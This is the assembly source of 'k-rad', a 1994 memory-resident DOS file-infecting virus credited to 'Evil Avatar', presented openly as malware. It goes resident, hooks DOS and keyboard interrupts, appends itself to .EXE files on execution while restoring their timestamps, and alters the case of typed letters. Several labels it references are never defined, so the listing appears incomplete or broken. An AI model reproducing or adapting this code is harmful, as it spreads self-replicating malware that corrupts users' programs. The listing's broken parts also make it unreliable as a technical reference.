comment #
Source code of k-rad
by Evil Avatar
; k-rad Virus
; (c) 1994 Evil Avatar
.model tiny
org 0
VLEN equ (end_virus-k_rad)
ID equ 0d00dh
VMEM equ (end_virus-k_rad+15)/16+1
VSIZEK equ (end_virus-k_rad+1023)/1024
;=====( Entry point for EXE files )========================================
k_rad: db 0b8h, 8ch, 0d3h, 15h, 33h, 75h, 72h, 0f9h, 0d4h, -1, 08ah, 0c4h
mov ah, 0bh
mov bx, ID
int 21h ;installation check
or bx, bx ;are we installed?
je no_install ;yes? exit then
push ds ;save PSP segment
mov ax, ds
dec ax ;get MCB segment
mov ds, ax ;put MCB segment into DS
sub di, di ;clear di for indexing
cmp byte ptr ds:[di], 'Z' ;last MCB in chain?
jnz no_install ;no? don't go resident
sub word ptr ds:[di+3], VMEM ;shrink host allocation
sub word ptr ds:[di+12h], VMEM ;alter PSP memory size field
mov es, word ptr ds:[di+12h] ;get new virus segment
call $+3
pop si
sub si, offset $-1 ;get a delta offset
mov cx, (heap-k_rad+1)/2 ;size of virus in words
rep movs word ptr es:[di], word ptr cs:[si] ;copy virus
mov ds, cx ;get IVT/BIOS data area
sub byte ptr ds:[413h], VSIZEK ;decrease total system memory
lds bx, dword ptr ds:[21h*4] ;get int 21h address
mov word ptr es:[save21], bx
mov word ptr es:[save21+2], ds ;save address
mov ds, cx
lds bx, dword ptr ds:[9h*4] ;get int 9h address
mov word ptr es:[save9], bx
mov word ptr es:[save9+2], ds ;save address
mov ds, cx
cli ;clear ints for IVT maipulation
mov word ptr ds:[21h*4], offset int21
mov word ptr ds:[21h*4+2], es ;set new int 21h address
mov word ptr ds:[9h*4], offset int9
mov word ptr ds:[9h*4+2], es ;set new int 9h address
sti ;restore ints
pop ds ;restore PSP segment
push ds
pop es
call delta
delta: pop bp ;get delta offset
mov ax, es ;get PSP segment
add ax, 10h ;adjust for PSP
add word ptr ss:[bp+cs_ip+2-delta], ax ;new CS
add word ptr ss:[bp+ss_sp-delta], ax ;new SS
cli ;clear ints for stack manipulation
mov sp, word ptr ss:[bp+ss_sp+2-delta] ;set new SP
mov ss, word ptr ss:[bp+ss_sp-delta] ;set new SS
sti ;restore ints
db 0eah
cs_ip dd 0fff00000h ;set new CS:IP
ss_sp dd ?
;=====( Interrupt 21h handler )============================================
int21: cmp ah, 0bh
jne i0 ;installation check
cmp bx, ID ;is it an installation check?
jne dos21 ;go? let DOS handle it
sub bx, bx ;zero BX for logical or
iret ;return to caller
i0: cmp ax, 4b00h ;execute?
je infect ;totally /<-RaD!
dos21: jmp dword ptr cs:[save21] ;jump to dos
db 'Made in the USA', 0 ;not an imported product
;=====( Infection routine )================================================
infect: push ax bx cx dx bp si di ds es ;save calling registers
cbw ;clear ax
mov ds, ax ;get IVT
cli ;clear ints for IVT manipulation
mov word ptr ds:[24h*4], offset int24
mov word ptr ds:[24h*4+2], cs ;set new int 24 handler
sti ;restore ints
mov ah, 3dh
push es
pop ds
int 21h ;open file read/only
jc no_good ;can't open? abort
push ax ;save handle
mov bx, 1220h
xchg ax, bx
int 2fh
mov ax, 1216h
sub bx, bx
mov bl, byte ptr es:[di]
int 2fh ;get SFT for handle
push cs
pop ds bx ;restore handle
mov ah, 3fh
mov cx, 1ch
mov dx, offset buffer
int 21h ;read in header
xchg si, dx
cmp ax, 'MZ' ;is it an .EXE?
je do_it ;yeah? attempt an infection
cmp ax, 'ZM' ;is it an screwy .EXE?
je do_it ;yeah? attempt to infect it
done: mov ah, 3eh
int 21h ;close file
pop es ds di si bp dx cx bx ax ;restore calling registers
jmp dos21 ;jump to dos
do_it: cmp word ptr ds:[si-2+12h], ID ;check checksum for infection
je done ;infected? abort
cmp word ptr ds:[si-2+0ch], -1 ;requests maximum memory?
jne done ;no? can't infect it properly
cmp word ptr ds:[si-2+1ah], 0 ;is it an overlay?
jnz done ;yes? can't infect it properly
mov ax, 4202h
sub cx, cx
int 21h ;go to end of file
push bx es di ax dx cs ;save registers
pop es
add word ptr ds:[si-2+0ah], VMEM-1 ;set new minimum memory
add ax, (heap-k_rad)
adc dx, 0
mov cx, 200h
div cx ;calculate pages in infected file
mov word ptr ds:[si], dx ;put it in header
or dx, dx ;remainder?
jz no_remainder ;no? no adjustment necessary
inc ax ;round up
mov word ptr ds:[si-2+4], ax ;save it
lea si, [si-2+14h] ;pointer to old CS:IP
lea di, [cs_ip]
movsw ;save it
sub si, 0ah ;point to SS:SP
movsw ;save it
pop dx ax ;restore file size
mov cx, 10h ;all the below stuff calculates
div cx ;the new CS:IP/SS:SP
mov bx, word ptr ds:[si-0eh-4+8]
sub ax, bx
sbb dx, 0
adjust_ip: ;make sure IP is less than 16
cmp dx, cx ;so SS can be in the same segment
jb fixed_ip
inc ax
sub dx, cx
jmp adjust_ip
mov cx, ID ;this below stuff saves the new
lea di, [buffer+0eh] ;CS:IP, SS:SP, and negative
stosw ;checksum
xchg ax, cx
xchg ax, dx
xchg ax, cx
pop di es bx ;restore handle and SFT
mov word ptr es:[di+2], 2 ;set to read/write
mov ah, 40h
mov cx, (heap-k_rad)
int 21h ;write virus to file
mov word ptr es:[di+15h], 0
mov word ptr es:[di+17h], 0 ;go to start of file
mov ah, 40h
mov cx, 1ch
lea dx, [buffer]
int 21h ;write new header
mov ax, 5701h
mov cx, word ptr es:[di+0dh]
mov dx, word ptr es:[di+0fh]
int 21h ;restore time/date
jmp done ;exit. done infecting
;=====( Critical error handler )===========================================
int24: iret
;=====( Interrupt 9h handler )=============================================
int9: push ax bx cx dx
mov ah, 0fh
int 10h ;get page number
mov ah, 3
int 10h ;get cursor position
mov ah, 2
dec dl
int 10h ;set position to previous character
mov ah, 8
int 10h ;get character
and al, 5fh ;make uppercase
cmp al, 41h ;check if it is a letter
jb no_change ;if not then exit
cmp al, 5ah
ja no_change
push ax ;save it
mov ah, 2
dec dl
int 10h ;set position to previous character
mov ah, 8
int 10h ;get character
cmp al, 41h ;is it uppercase?
jb no_fix ;no? make next character uppercase
cmp al, 5ah ;is it uppercase?
ja no_fix ;no? make next one uppercase
fix: pop ax ;restore old letter
add al, 20h ;make lowercase
jmp new_char
no_fix: pop ax ;restore old letter
inc dl
mov ah, 2
int 10h ;move forward one character
mov ah, 0ah
mov cx, 1
int 10h ;write new letter
mov ah, 2
inc dl
int 10h ;restore old cursor position
pop dx cx bx ax ;restore used registers
jmp dword ptr cs:[save9] ;jump to old int 9 handler
;=====( Virus data area )==================================================
virus db '[k-rad]', 0
author db 'by Evil Avatar', 0
save21 dd ?
save9 dd ?
buffer db 1ch dup (?)
end k_rad